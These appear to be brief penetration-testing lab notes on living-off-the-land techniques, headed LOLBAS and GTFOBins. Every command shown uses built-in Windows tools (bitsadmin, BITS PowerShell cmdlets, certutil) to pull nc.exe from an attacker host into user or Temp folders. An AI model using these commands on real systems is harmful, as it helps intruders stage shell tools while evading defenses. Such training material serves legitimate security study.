LOLBAS and GTFOBins
LOLBAS
GTFOBins
Other Common Living off the Land tools
Bitsadmin Download function
File Download with Bitsadmin
PS C:\sam> bitsadmin /transfer wcb /priority foreground http://10.10.15.66:8000/nc.exe C:\Users\htb-student\Desktop\nc.exe
Download
PS C:\sam> Import-Module bitstransfer; Start-BitsTransfer -Source "http://10.10.10.32:8000/nc.exe" -Destination "C:\Windows\Temp\nc.exe"
Certutil
Download a File with Certutil
C:\sam> certutil.exe -verifyctl -split -f http://10.10.10.32:8000/nc.exe